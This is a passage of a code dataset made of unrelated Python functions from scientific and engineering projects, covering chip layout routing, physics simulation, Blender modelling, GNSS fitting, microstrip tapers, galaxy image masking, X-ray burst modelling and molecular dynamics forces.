self.add_contact(layers=(\"poly\", \"contact\", \"metal1\"),\n offset=offset,\n rotate=90)\n\n self.add_rect(layer=\"poly\",\n offset=offset,\n width=-(self.poly_contact.first_layer_position.y + drc[\"minwidth_poly\"]),\n height=self.poly_contact.first_layer_width)\n self.add_layout_pin(text=\"B\",\n layer=\"metal1\",\n offset=[0,\n self.B_position.y - 0.5 * drc[\"minwidth_metal1\"]],\n width=self.B_position.x,\n height=drc[\"minwidth_metal1\"])", "def __init__(self):\r\n\t\tsuper(Empty, self).__init__()\r\n\r\n\t\t# Initialize all of the objects\r\n\t\tground = self.world.CreateStaticBody(\r\n\t\t\tshapes=[ \r\n\t\t\t\tb2EdgeShape(vertices=[(-40,0),(40,0)])\r\n\t\t\t\t#~ b2EdgeShape(vertices=[(-1.1,-40),(-1.1,40)]),\r\n\t\t\t\t]\r\n\t\t) \r\n\t\tbox=b2FixtureDef(\r\n\t\t\tshape=b2PolygonShape(box=(0.3,0.3)),\r\n\t\t\tdensity=0.01,\r\n\t\t\tfriction=0.3)\t\t\r\n\t\t\r\n\t\tself.q = 
[qcopter(self.world,self.renderer,1,0.05,-8,8,0,1)]##,qcopter(self.world,self.renderer,1,0.1,-12,8,0,0)]\r\n\t\r\n\t\t(self.kp,self.ki,self.kd) = self.q[0].GetCoefs(self.q[0].configer)\r\n\t\t\r\n\t\t# The platform\r\n\t\t#~ fixture=b2FixtureDef(\r\n\t\t\t#~ shape=b2PolygonShape(box=(0.02,4.5)), \r\n\t\t\t#~ density=1,\r\n\t\t\t#~ friction=0.6,\r\n\t\t#~ )\t\t\t\r\n\r\n\t\t#~ self.platform=self.world.CreateDynamicBody(position=(-8,4.5), fixtures=fixture, )\r\n\t\t\r\n\t\t#~ self.platform.type=b2_staticBody\r\n\t\tif not(self.q[0].x_pid or self.q[0].y_pid):\t\r\n\t\t\tself.world.CreateRevoluteJoint(\r\n\t\t\t\tbodyA=self.q[0].body,\r\n\t\t\t\tbodyB=ground,\r\n\t\t\t\tanchor=(self.q[0].GetPos().x,self.q[0].GetPos().y),\r\n\t\t\t\tmaxMotorTorque=0,\r\n\t\t\t\tenableMotor=False\r\n\t\t\t)\r\n\t\t\t\t\r\n\t\tfor i in xrange(10):\r\n\t\t\tfor j in xrange(5+i/5):\r\n\t\t\t\tself.world.CreateDynamicBody(\r\n\t\t\t\t\tfixtures=box,\r\n\t\t\t\t\tposition=(i*3-10, 1+1*j)\r\n\t\t\t\t)", "def add_stretch() -> NoReturn:\n DiagramFieldView.__diagram_field.__group_layout.addWidget(\n DiagramFieldView.__diagram_field.__stretch_widget, 10, Qt.AlignBottom)", "def bvlprms():\n # cretate modifrs \"BEVEL\"\n bpy.ops.transform.edge_bevelweight(value=1)\n bpy.ops.object.modifier_add(type='BEVEL')\n bnm = bpy.context.object.modifiers[- 1].name\n # my paramtrs a \"BEVEL\"\n bpy.context.object.modifiers[bnm].use_clamp_overlap = self.bclmp\n bpy.context.object.modifiers[bnm].limit_method = 'WEIGHT'\n bpy.context.object.modifiers[bnm].width = self.lst2\n bpy.context.object.modifiers[bnm].segments = 6\n bpy.context.object.modifiers[bnm].show_in_editmode = self.bedt\n bpy.context.scene.objects.active = bpy.context.scene.objects.active", "def pwlFly(site_residuals, azSpacing=0.5,zenSpacing=0.5):\n tdata = res.reject_absVal(site_residuals,100.)\n del site_residuals \n data = res.reject_outliers_elevation(tdata,5,0.5)\n del tdata\n\n numd = np.shape(data)[0]\n numZD = int(90.0/zenSpacing) + 1\n numAZ = int(360./zenSpacing)\n pwl_All = np.zeros((numAZ,numZD))\n pwlSig_All = np.zeros((numAZ,numZD))\n Bvec_complete = []\n Sol_complete = []\n meas_complete = []\n model_complete = []\n postchis = []\n prechis = []\n aics = []\n bics = []\n #w = 1;\n\n for j in range(0,numAZ):\n # Find only those value within this azimuth bin:\n if(j - azSpacing/2. < 0) :\n criterion = (data[:,1] < (j + azSpacing/2.)) | (data[:,1] > (360. - azSpacing/2.) )\n else:\n criterion = (data[:,1] < (j + azSpacing/2.)) & (data[:,1] > (j - azSpacing/2.) )\n ind = np.array(np.where(criterion))[0]\n azData =data[ind,:]\n numd = np.shape(azData)[0]\n #print(\"NUMD:\",numd)\n if numd < 2:\n continue\n #\n # Neq is acting like a constrain on the model a small value 0.001\n # let the model vary by 1000 mm\n # will let it vary more. 
a large value -> 1 will force the model to be closer to 0\n # This gets too large for lots of observations, s best to doit on the fly..\n #\n Neq = np.eye(numZD,dtype=float)# * 0.001\n Apart = np.zeros((numd,numZD))\n\n for i in range(0,numd):\n iz = int(np.floor(azData[i,2]/zenSpacing))\n Apart[i,iz] = (1.-(azData[i,2]-iz*zenSpacing)/zenSpacing)\n Apart[i,iz+1] = (azData[i,2]-iz*zenSpacing)/zenSpacing\n w = np.sin(data[i,2]/180.*np.pi)\n for k in range(iz,iz+2):\n for l in range(iz,iz+2):\n Neq[k,l] = Neq[k,l] + (Apart[i,l]*Apart[i,k]) * 1./w**2\n\n prechi = np.dot(azData[:,3].T,azData[:,3])\n\n Bvec = np.dot(Apart.T,azData[:,3])\n for val in Bvec:\n Bvec_complete.append(val)\n\n Cov = np.linalg.pinv(Neq)\n Sol = np.dot(Cov,Bvec)\n for val in Sol:\n Sol_complete.append(val)\n\n #Qxx = np.dot(Apart.T,Apart)\n #Qvv = np.subtract( np.eye(numd) , np.dot(np.dot(Apart,Qxx),Apart.T))\n #sd = np.squeeze(np.diag(Qvv))\n #dx = np.dot(np.linalg.pinv(Qxx),Bvec)\n #dl = np.dot(Apart,dx)\n\n postchi = prechi - np.dot(Bvec.T,Sol)\n postchis.append(np.sqrt(postchi/numd))\n prechis.append(np.sqrt(prechi/numd))\n pwlsig = np.sqrt(np.diag(Cov) *postchi/numd)\n\n # calculate the model values for each obs\n model = np.dot(Apart,Sol) #np.zeros(numd)\n for d in range(0,numd):\n model_complete.append(model[d])\n meas_complete.append(azData[d,3])\n # zen = azData[d,2]\n # iz = int(np.floor(azData[d,2]/zenSpacing))\n # #model[d] = Sol[iz]\n\n #print(\"STATS:\",numd,np.sqrt(prechi/numd),np.sqrt(postchi/numd),np.sqrt((prechi-postchi)/numd),gls_results.rsquared,gls_results.aic,gls_results.bic)\n \n # loglikelihood(meas,model,sd)\n #sd = np.squeeze(np.diag(Qvv))\n #print(\"meas, model, sd:\",np.shape(azData),np.shape(model),np.shape(sd))\n f = loglikelihood(azData[:,3],model)\n dof = numd - np.shape(Sol)[0]\n aic = calcAIC(f,dof)\n bic = calcBIC(f,dof,numd)\n aics.append(aic) \n bics.append(bic) \n #print(\"=========================\")\n pwl_All[j,:] = Sol \n pwlSig_All[j,:] = pwlsig\n\n del Sol,pwlsig,Cov,Bvec,Neq,Apart,azData,ind\n\n #A_complete = np.squeeze(np.asarray(A_complete.todense()))\n #print(\"A shape\",np.shape(A_complete))\n\n print(\"Doing a fit to the data\")\n f = loglikelihood(np.array(meas_complete),np.array(model_complete))\n numd = np.size(meas_complete)\n dof = numd - np.shape(Sol_complete)[0]\n aic = calcAIC(f,dof)\n bic = calcBIC(f,dof,numd)\n #prechi = np.dot(data[:,3].T,data[:,3])\n prechi = np.dot(np.array(meas_complete).T,np.array(meas_complete))\n postchi = prechi - np.dot(np.array(Bvec_complete).T,np.array(Sol_complete))\n #print(\"My loglikelihood:\",f,aic,bic,dof,numd)\n print(\"STATS:\",numd,np.sqrt(prechi/numd),np.sqrt(postchi/numd),np.sqrt((prechi-postchi)/numd),aic,bic)\n\n return pwl_All, pwlSig_All", "def __init__(self, layers, design, gds_filename=None, rail_track_width=1):\n router_tech.__init__(self, layers, rail_track_width)\n \n self.cell = design\n\n # If didn't specify a gds blockage file, write it out to read the gds\n # This isn't efficient, but easy for now\n #start_time = datetime.now()\n if not gds_filename:\n gds_filename = OPTS.openram_temp+\"temp.gds\"\n self.cell.gds_write(gds_filename)\n\n # Load the gds file and read in all the shapes\n self.layout = gdsMill.VlsiLayout(units=GDS[\"unit\"])\n self.reader = gdsMill.Gds2reader(self.layout)\n self.reader.loadFromFile(gds_filename)\n self.top_name = self.layout.rootStructureName\n #print_time(\"GDS read\",datetime.now(), start_time)\n \n ### The pin data structures\n # A map of pin names to a set of pin_layout 
structures\n # (i.e. pins with a given label)\n self.pins = {}\n # This is a set of all pins (ignoring names) so that can quickly not create blockages for pins\n # (They will be blocked when we are routing other nets based on their name.)\n self.all_pins = set()\n \n # The labeled pins above categorized into pin groups that are touching/connected.\n self.pin_groups = {}\n \n ### The blockage data structures\n # A list of metal shapes (using the same pin_layout structure) that are not pins but blockages.\n self.blockages=[]\n # The corresponding set of blocked grids for above pin shapes\n self.blocked_grids = set()\n \n ### The routed data structures\n # A list of paths that have been \"routed\"\n self.paths = []\n # A list of path blockages (they might be expanded for wide metal DRC)\n self.path_blockages = []\n\n # The boundary will determine the limits to the size of the routing grid\n self.boundary = self.layout.measureBoundary(self.top_name)\n # These must be un-indexed to get rid of the matrix type\n self.ll = vector(self.boundary[0][0], self.boundary[0][1])\n self.ur = vector(self.boundary[1][0], self.boundary[1][1])", "def __init__(self,batery_size = 75):\n self.batery_size = batery_size", "def hecken_taper(length = 200, B = 4.0091, dielectric_thickness = 0.25,\n eps_r = 2, Lk_per_sq = 250e-12, Z1 = None, Z2 = None,\n width1 = None, width2 = None, num_pts = 100, layer = 0):\n if width1 is not None: Z1 = _microstrip_Z_with_Lk(\n width1*1e-6,\n dielectric_thickness*1e-6,\n eps_r, Lk_per_sq\n )\n if width2 is not None: Z2 = _microstrip_Z_with_Lk(\n width2*1e-6,\n dielectric_thickness*1e-6,\n eps_r, Lk_per_sq\n )\n # Normalized length of the wire [-1 to +1]\n xi_list = np.linspace(-1, 1, num_pts)\n Z = [np.exp(0.5*log(Z1*Z2) + 0.5*log(Z2/Z1)*_G(xi, B)) for xi in xi_list]\n widths = np.array([_find_microstrip_wire_width(\n z, dielectric_thickness*1e-6,\n eps_r, Lk_per_sq\n )*1e6 for z in Z])\n x = ((xi_list/2)*length)\n\n # Compensate for varying speed of light in the microstrip by shortening\n # and lengthening sections according to the speed of light in that section\n v = np.array([_microstrip_v_with_Lk(w*1e-6, dielectric_thickness*1e-6,\n eps_r, Lk_per_sq) for w in widths])\n dx = np.diff(x)\n dx_compensated = dx*v[:-1]\n x_compensated = np.cumsum(dx_compensated)\n x = np.hstack([0, x_compensated])/max(x_compensated) * length\n\n # Create blank device and add taper polygon\n D = Device('hecken')\n xpts = np.concatenate([x, x[::-1]])\n ypts = np.concatenate([widths/2, -widths[::-1]/2])\n D.add_polygon((xpts, ypts), layer = layer)\n D.add_port(name = 1, midpoint = (0, 0), width = widths[0],\n orientation = 180)\n D.add_port(name = 2, midpoint = (length, 0), width = widths[-1],\n orientation = 0)\n\n # Add meta information about the taper\n D.info['num_squares'] = np.sum(np.diff(x)/widths[:-1])\n D.info['width1'] = widths[0]\n D.info['width2'] = widths[-1]\n D.info['Z1'] = Z[0]\n D.info['Z2'] = Z[-1]\n # Note there are two values for v/c (and f_cutoff) because the speed of\n # light is different at the beginning and end of the taper\n D.info['w'] = widths\n D.info['x'] = x\n D.info['Z'] = Z\n D.info['v/c'] = v/3e8\n D.info['time_length'] = np.sum(np.diff(D.info['x']*1e-6) \\\n / (D.info['v/c'][:-1]*3e8))\n BetaLmin = sqrt(B**2 + 6.523)\n D.info['f_cutoff'] = 1/(2*D.info['time_length'])\n D.info['length'] = length\n\n return D", "def _build_multiband_mask(data, tractor, filt2pixscale, fill_value=0.0,\n threshmask=0.01, r50mask=0.05, maxshift=10,\n relmaxshift=0.1,\n sigmamask=3.0, 
neighborfactor=1.0, verbose=False):\n import numpy.ma as ma\n from copy import copy\n from skimage.transform import resize\n from legacyhalos.mge import find_galaxy\n from legacyhalos.misc import srcs2image, ellipse_mask\n\n import matplotlib.pyplot as plt\n from astropy.visualization import simple_norm\n\n bands, refband = data['bands'], data['refband']\n #residual_mask = data['residual_mask']\n\n #nbox = 5\n #box = np.arange(nbox)-nbox // 2\n #box = np.meshgrid(np.arange(nbox), np.arange(nbox))[0]-nbox//2\n\n xobj, yobj = np.ogrid[0:data['refband_height'], 0:data['refband_width']]\n\n # If the row-index of the central galaxy is not provided, use the source\n # nearest to the center of the field.\n if 'galaxy_indx' in data.keys():\n galaxy_indx = np.atleast_1d(data['galaxy_indx'])\n else:\n galaxy_indx = np.array([np.argmin((tractor.bx - data['refband_height']/2)**2 +\n (tractor.by - data['refband_width']/2)**2)])\n data['galaxy_indx'] = np.atleast_1d(galaxy_indx)\n data['galaxy_id'] = ''\n\n #print('Import hack!')\n #norm = simple_norm(img, 'log', min_percent=0.05, clip=True)\n #import matplotlib.pyplot as plt ; from astropy.visualization import simple_norm\n\n ## Get the PSF sources.\n #psfindx = np.where(tractor.type == 'PSF')[0]\n #if len(psfindx) > 0:\n # psfsrcs = tractor.copy()\n # psfsrcs.cut(psfindx)\n #else:\n # psfsrcs = None\n\n def tractor2mge(indx, factor=1.0):\n # Convert a Tractor catalog entry to an MGE object.\n class MGEgalaxy(object):\n pass\n\n default_majoraxis = tractor.diam_init[indx] * 60 / 2 / filt2pixscale[refband] # [pixels]\n default_pa = tractor.pa_init[indx]\n default_ba = tractor.ba_init[indx]\n #default_theta = (270 - default_pa) % 180\n #default_eps = 1 - tractor.ba_init[indx]\n\n #if tractor.sga_id[indx] > -1:\n if tractor.type[indx] == 'PSF' or tractor.shape_r[indx] < 2:\n pa = tractor.pa_init[indx]\n ba = tractor.ba_init[indx]\n # take away the extra factor of 2 we put in in read_sample()\n r50 = tractor.diam_init[indx] * 60 / 2 / 2\n if r50 < 5:\n r50 = 5.0 # minimum size, arcsec\n majoraxis = factor * r50 / filt2pixscale[refband] # [pixels]\n #majoraxis = factor * tractor.diam_init[indx] * 60 / 2 / 2 / filt2pixscale[refband] # [pixels]\n else:\n ee = np.hypot(tractor.shape_e1[indx], tractor.shape_e2[indx])\n ba = (1 - ee) / (1 + ee)\n pa = 180 - (-np.rad2deg(np.arctan2(tractor.shape_e2[indx], tractor.shape_e1[indx]) / 2))\n pa = pa % 180\n\n # can be zero (or very small) if fit as a PSF or REX\n if tractor.shape_r[indx] > 1:\n majoraxis = factor * tractor.shape_r[indx] / filt2pixscale[refband] # [pixels]\n else:\n majoraxis = factor * tractor.diam_init[indx] * 60 / 2 / 2 / filt2pixscale[refband] # [pixels]\n\n mgegalaxy = MGEgalaxy()\n \n mgegalaxy.xmed = tractor.by[indx]\n mgegalaxy.ymed = tractor.bx[indx]\n mgegalaxy.xpeak = tractor.by[indx]\n mgegalaxy.ypeak = tractor.bx[indx]\n\n # never use the Tractor geometry (only the centroid)\n # https://portal.nersc.gov/project/cosmo/temp/ioannis/virgofilaments-html/215/NGC5584/NGC5584.html\n if True:\n mgegalaxy.eps = 1-ba\n mgegalaxy.pa = pa\n mgegalaxy.theta = (270 - pa) % 180\n mgegalaxy.majoraxis = majoraxis\n else:\n mgegalaxy.eps = 1 - default_ba\n mgegalaxy.pa = default_pa\n mgegalaxy.theta = (270 - default_pa) % 180\n mgegalaxy.majoraxis = default_majoraxis\n\n # always restore all pixels within the nominal / initial size of the galaxy\n #objmask = ellipse_mask(mgegalaxy.xmed, mgegalaxy.ymed, # object pixels are True\n # default_majoraxis,\n # default_majoraxis * (1-default_eps), \n # 
np.radians(default_theta-90), xobj, yobj)\n #objmask = ellipse_mask(mgegalaxy.xmed, mgegalaxy.ymed, # object pixels are True\n # default_majoraxis, default_majoraxis, 0.0, xobj, yobj)\n\n objmask = ellipse_mask(mgegalaxy.xmed, mgegalaxy.ymed, # object pixels are True\n mgegalaxy.majoraxis,\n mgegalaxy.majoraxis * (1-mgegalaxy.eps), \n np.radians(mgegalaxy.theta-90), xobj, yobj)\n\n # central 10% pixels can override the starmask\n objmask_center = ellipse_mask(mgegalaxy.xmed, mgegalaxy.ymed, # object pixels are True\n 0.1*mgegalaxy.majoraxis,\n 0.1*mgegalaxy.majoraxis * (1-mgegalaxy.eps), \n np.radians(mgegalaxy.theta-90), xobj, yobj)\n\n return mgegalaxy, objmask, objmask_center\n\n # Now, loop through each 'galaxy_indx' from bright to faint.\n data['mge'] = []\n for ii, central in enumerate(galaxy_indx):\n print('Determing the geometry for galaxy {}/{}.'.format(\n ii+1, len(galaxy_indx)))\n\n # [1] Determine the non-parametric geometry of the galaxy of interest\n # in the reference band. First, subtract all models except the galaxy\n # and galaxies \"near\" it. Also restore the original pixels of the\n # central in case there was a poor deblend.\n largeshift = False\n mge, centralmask, centralmask2 = tractor2mge(central, factor=1.0)\n #plt.clf() ; plt.imshow(centralmask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-mask.png') ; pdb.set_trace()\n\n iclose = np.where([centralmask[np.int(by), np.int(bx)]\n for by, bx in zip(tractor.by, tractor.bx)])[0]\n \n srcs = tractor.copy()\n srcs.cut(np.delete(np.arange(len(tractor)), iclose))\n model = srcs2image(srcs, data['{}_wcs'.format(refband.lower())],\n band=refband.lower(),\n pixelized_psf=data['{}_psf'.format(refband.lower())])\n\n img = data[refband].data - model\n img[centralmask] = data[refband].data[centralmask]\n\n mask = np.logical_or(ma.getmask(data[refband]), data['residual_mask'])\n #mask = np.logical_or(data[refband].mask, data['residual_mask'])\n\n # restore the central pixels but not the masked stellar pixels\n centralmask[np.logical_and(data['starmask'], np.logical_not(centralmask2))] = False\n mask[centralmask] = False\n\n img = ma.masked_array(img, mask)\n ma.set_fill_value(img, fill_value)\n #if ii == 1:\n # pdb.set_trace()\n\n mgegalaxy = find_galaxy(img, nblob=1, binning=1, quiet=False)#, plot=True) ; plt.savefig('cosmo-www/tmp/junk-mge.png')\n #plt.clf() ; plt.imshow(mask, origin='lower') ; plt.savefig('junk-mask.png')\n ##plt.clf() ; plt.imshow(satmask, origin='lower') ; plt.savefig('/mnt/legacyhalos-data/debug.png')\n #pdb.set_trace()\n\n # Did the galaxy position move? 
If so, revert back to the Tractor geometry.\n if np.abs(mgegalaxy.xmed-mge.xmed) > maxshift or np.abs(mgegalaxy.ymed-mge.ymed) > maxshift:\n print('Large centroid shift (x,y)=({:.3f},{:.3f})-->({:.3f},{:.3f})'.format(\n mgegalaxy.xmed, mgegalaxy.ymed, mge.xmed, mge.ymed))\n print(' Reverting to the default geometry and the Tractor centroid.')\n largeshift = True\n mgegalaxy = copy(mge)\n\n radec_med = data['{}_wcs'.format(refband.lower())].pixelToPosition(\n mgegalaxy.ymed+1, mgegalaxy.xmed+1).vals\n radec_peak = data['{}_wcs'.format(refband.lower())].pixelToPosition(\n mgegalaxy.ypeak+1, mgegalaxy.xpeak+1).vals\n mge = {\n 'largeshift': largeshift,\n 'ra': tractor.ra[central], 'dec': tractor.dec[central],\n 'bx': tractor.bx[central], 'by': tractor.by[central],\n #'mw_transmission_g': tractor.mw_transmission_g[central],\n #'mw_transmission_r': tractor.mw_transmission_r[central],\n #'mw_transmission_z': tractor.mw_transmission_z[central],\n 'ra_moment': radec_med[0], 'dec_moment': radec_med[1],\n #'ra_peak': radec_med[0], 'dec_peak': radec_med[1]\n }\n for key in ('eps', 'majoraxis', 'pa', 'theta', 'xmed', 'ymed', 'xpeak', 'ypeak'):\n mge[key] = np.float32(getattr(mgegalaxy, key))\n if key == 'pa': # put into range [0-180]\n mge[key] = mge[key] % np.float32(180)\n data['mge'].append(mge)\n\n #if False:\n # #plt.clf() ; plt.imshow(mask, origin='lower') ; plt.savefig('/mnt/legacyhalos-data/debug.png')\n # plt.clf() ; mgegalaxy = find_galaxy(img, nblob=1, binning=1, quiet=True, plot=True)\n # plt.savefig('/mnt/legacyhalos-data/debug.png')\n\n # [2] Create the satellite mask in all the bandpasses. Use srcs here,\n # which has had the satellites nearest to the central galaxy trimmed\n # out.\n print('Building the satellite mask.')\n satmask = np.zeros(data[refband].shape, bool)\n for filt in bands:\n # do not let GALEX and WISE contribute to the satellite mask\n if data[filt].shape != satmask.shape:\n continue\n \n cenflux = getattr(tractor, 'flux_{}'.format(filt.lower()))[central]\n satflux = getattr(srcs, 'flux_{}'.format(filt.lower()))\n if cenflux <= 0.0:\n #raise ValueError('Central galaxy flux is negative!')\n print('Central galaxy flux is negative! Proceed with caution...')\n #pdb.set_trace()\n \n satindx = np.where(np.logical_or(\n (srcs.type != 'PSF') * (srcs.shape_r > r50mask) *\n (satflux > 0.0) * ((satflux / cenflux) > threshmask),\n srcs.ref_cat == 'R1'))[0]\n #satindx = np.where(srcs.ref_cat == 'R1')[0]\n #if np.isin(central, satindx):\n # satindx = satindx[np.logical_not(np.isin(satindx, central))]\n if len(satindx) == 0:\n #raise ValueError('All satellites have been dropped!')\n #print('Warning! 
All satellites have been dropped from band {}!'.format(filt))\n print('Note: no satellites to mask in band {}.'.format(filt))\n else:\n satsrcs = srcs.copy()\n #satsrcs = tractor.copy()\n satsrcs.cut(satindx)\n satimg = srcs2image(satsrcs, data['{}_wcs'.format(filt.lower())],\n band=filt.lower(),\n pixelized_psf=data['{}_psf'.format(filt.lower())])\n thissatmask = satimg > sigmamask*data['{}_sigma'.format(filt.lower())]\n #if filt == 'FUV':\n # plt.clf() ; plt.imshow(thissatmask, origin='lower') ; plt.savefig('junk-{}.png'.format(filt.lower()))\n # #plt.clf() ; plt.imshow(data[filt], origin='lower') ; plt.savefig('junk-{}.png'.format(filt.lower()))\n # pdb.set_trace()\n if satmask.shape != satimg.shape:\n thissatmask = resize(thissatmask*1.0, satmask.shape, mode='reflect') > 0\n\n satmask = np.logical_or(satmask, thissatmask)\n #if True:\n # import matplotlib.pyplot as plt\n # plt.clf() ; plt.imshow(np.log10(satimg), origin='lower') ; plt.savefig('debug.png')\n # plt.clf() ; plt.imshow(satmask, origin='lower') ; plt.savefig('debug.png')\n ## #plt.clf() ; plt.imshow(satmask, origin='lower') ; plt.savefig('/mnt/legacyhalos-data/debug.png')\n # pdb.set_trace()\n\n #print(filt, np.sum(satmask), np.sum(thissatmask))\n\n #plt.clf() ; plt.imshow(satmask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-satmask.png')\n \n # [3] Build the final image (in each filter) for ellipse-fitting. First,\n # subtract out the PSF sources. Then update the mask (but ignore the\n # residual mask). Finally convert to surface brightness.\n #for filt in ['W1']:\n for filt in bands:\n thismask = ma.getmask(data[filt])\n if satmask.shape != thismask.shape:\n _satmask = (resize(satmask*1.0, thismask.shape, mode='reflect') > 0) == 1.0\n _centralmask = (resize(centralmask*1.0, thismask.shape, mode='reflect') > 0) == 1.0\n mask = np.logical_or(thismask, _satmask)\n mask[_centralmask] = False\n else:\n mask = np.logical_or(thismask, satmask)\n mask[centralmask] = False\n #if filt == 'r':\n # #plt.imshow(_satmask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-satmask-{}.png'.format(filt))\n # plt.clf() ; plt.imshow(mask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-mask-{}.png'.format(filt))\n # plt.clf() ; plt.imshow(img, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-img-{}.png'.format(filt))\n # pdb.set_trace()\n\n varkey = '{}_var'.format(filt.lower())\n imagekey = '{}_masked'.format(filt.lower())\n psfimgkey = '{}_psfimg'.format(filt.lower())\n thispixscale = filt2pixscale[filt]\n if imagekey not in data.keys():\n data[imagekey], data[varkey], data[psfimgkey] = [], [], []\n\n img = ma.getdata(data[filt]).copy()\n \n # Get the PSF sources.\n psfindx = np.where((tractor.type == 'PSF') * (getattr(tractor, 'flux_{}'.format(filt.lower())) / cenflux > threshmask))[0]\n if len(psfindx) > 0 and filt.upper() != 'W3' and filt.upper() != 'W4': \n #if len(psfindx) > 0 and filt.upper() != 'NUV' and filt.upper() != 'FUV' and filt.upper() != 'W3' and filt.upper() != 'W4':\n psfsrcs = tractor.copy()\n psfsrcs.cut(psfindx)\n else:\n psfsrcs = None\n \n if psfsrcs:\n psfimg = srcs2image(psfsrcs, data['{}_wcs'.format(filt.lower())],\n band=filt.lower(),\n pixelized_psf=data['{}_psf'.format(filt.lower())])\n if False:\n #import fitsio ; fitsio.write('junk-psf-{}.fits'.format(filt.lower()), data['{}_psf'.format(filt.lower())].img, clobber=True)\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)\n im = ax1.imshow(np.log10(img), origin='lower') ; fig.colorbar(im, ax=ax1)\n im = 
ax2.imshow(np.log10(psfimg), origin='lower') ; fig.colorbar(im, ax=ax2)\n im = ax3.imshow(np.log10(data['{}_psf'.format(filt.lower())].img), origin='lower') ; fig.colorbar(im, ax=ax3)\n im = ax4.imshow(img-psfimg, origin='lower') ; fig.colorbar(im, ax=ax4)\n plt.savefig('desi-users/ioannis/tmp/qa-psf-{}.png'.format(filt.lower()))\n if filt == 'r':# or filt == 'r':\n pdb.set_trace()\n img -= psfimg\n else:\n psfimg = np.zeros((2, 2), 'f4')\n\n data[psfimgkey].append(psfimg)\n \n img = ma.masked_array((img / thispixscale**2).astype('f4'), mask) # [nanomaggies/arcsec**2]\n var = data['{}_var_'.format(filt.lower())] / thispixscale**4 # [nanomaggies**2/arcsec**4]\n\n # Fill with zeros, for fun--\n ma.set_fill_value(img, fill_value)\n #if ii == 0 and filt == 'r': #filt == 'W1' or \n # plt.clf() ; plt.imshow(img, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-img-{}.png'.format(filt.lower()))\n # plt.clf() ; plt.imshow(mask, origin='lower') ; plt.savefig('desi-users/ioannis/tmp/junk-mask-{}.png'.format(filt.lower()))\n ##### plt.clf() ; plt.imshow(thismask, origin='lower') ; plt.savefig('junk-thismask-{}.png'.format(filt.lower()))\n # pdb.set_trace()\n \n data[imagekey].append(img)\n data[varkey].append(var)\n\n #test = data['r_masked'][0]\n #plt.clf() ; plt.imshow(np.log(test.clip(test[mgegalaxy.xpeak, mgegalaxy.ypeak]/1e4)), origin='lower') ; plt.savefig('/mnt/legacyhalos-data/debug.png')\n #pdb.set_trace()\n\n # Cleanup?\n for filt in bands:\n del data[filt]\n del data['{}_var_'.format(filt.lower())]\n\n return data", "def setStretch(self, ln):\n\n s = stof(ln[0])\n\n if s < 1 or s > 500:\n error(\"%s Stretch: value must be a percentage in range 1 to 500, not '%s'\" \\\n % (self.name, s))\n\n self.stretch = s/100.", "def burstensemble( base, x_0, z, dist, xi_p, mass, radius, bean, full_model=False ):\n\n minmdot = 0.0\n maxmdot = 1.0\n mdot_res = 1e-6\n sbt = bean.bstart\n salpha = []\n stime = []\n smdot = []\n se_b = []\n\n mdot = bean.flux_to_mdot(x_0, dist, xi_p, mass, radius, bean.pflux)\n\n for i in range(0, bean.numburstsobs):\n\n tmp = settle(base, z, x_0, mdot[i], 1.0, mass, radius)\n\n res = np.recarray(\n (1,), dtype=[(\"tdel\", np.float64), (\"e_b\", np.float64), (\"alpha\", np.float64), (\"mdot\", np.float64)]\n )\n # assign elements\n res.tdel = tmp.tdel / 24.0\n res.e_b = tmp.E_b*0.8 # multiply eb by 0.8 to account for incomlpete burning of fuel, as in Goodwin et al (2018).\n alpha = tmp.alpha\n alpha = alpha[0]\n res.mdot = mdot[i]\n _e_b = res.e_b\n _e_b = _e_b[0]\n se_b.append(_e_b)\n _mdot = res.mdot\n _mdot = _mdot[0]\n salpha.append(alpha)\n smdot.append(_mdot)\n # stime.append(bstart[i])\n stime.append(tmp.tdel[0])\n mdot_max = max(smdot)\n\n result = dict()\n\n if full_model:\n # model parameters are redundant for the model returned\n result[\"base\"] = [base]\n result[\"z\"] = [z]\n result[\"x_0\"] = [x_0]\n result[\"dist\"] = [dist]\n result[\"xi_p\"] = [xi_p]\n\n result[\"mdot_max\"] = [mdot_max]\n\n result[\"mass\"] = [mass]\n result[\"radius\"] = [radius]\n\n # now the actual predictions\n\n result[\"time\"] = stime\n result[\"mdot\"] = smdot\n result[\"alpha\"] = salpha\n result[\"e_b\"] = se_b\n\n # omit the printing for now, as it prevents assessing the progress\n # print('ensemble')\n # print(f\"In burstrain fluence is {se_b}\")\n\n return result", "def force ( box, strain, r ):\n\n import numpy as np\n from itertools import product\n import math\n \n # It is assumed that positions are in units where box = 1\n # Forces are calculated in units where 
sigma = 1 and epsilon = 1\n # Lees-Edwards boundaries, in sliding brick arrangement\n # Flow/gradient/vorticity directions are x/y/z == 0/1/2\n # Uses neighbour lists\n\n n = r.shape[0]\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 cells in cubic lattice\n # The cells are chosen so that if (d0,d1,d2) appears, then (-d0,-d1,-d2) does not.\n # The last three cells are extra ones, to cope with the sheared system\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 0, 1], [-1, 0, 1], [ 0, 0, 1], # 5 cells with d1=0\n [ 1, 1, -1], [ 1, 1, 0], [ 1, 1, 1], # 3 cells with d0= 1, d1=1\n [ 0, 1, -1], [ 0, 1, 0], [ 0, 1, 1], # 3 cells with d0= 0, d1=1\n [-1, 1, -1], [-1, 1, 0], [-1, 1, 1], # 3 cells with d0=-1, d1=1\n [-2, 1, -1], [-2, 1, 0], [-2, 1, 1] ] ) # 3 cells with d0=-2, d1=1\n\n r[:,0] = r[:,0] - np.rint(r[:,1])*strain # Extra correction in box=1 units\n r = r - np.rint(r) # Ensure all atoms in periodic box\n \n sr2_ovr = 1.77 # Overlap threshold (pot > 100)\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n # Initialize\n f = np.zeros_like(r)\n total = PotentialType ( pot=0.0, vir=0.0, pyx=0.0, lap=0.0, ovr=False )\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n assert sc >= 3, 'System is too small for cells' # Guard against box being too small\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) 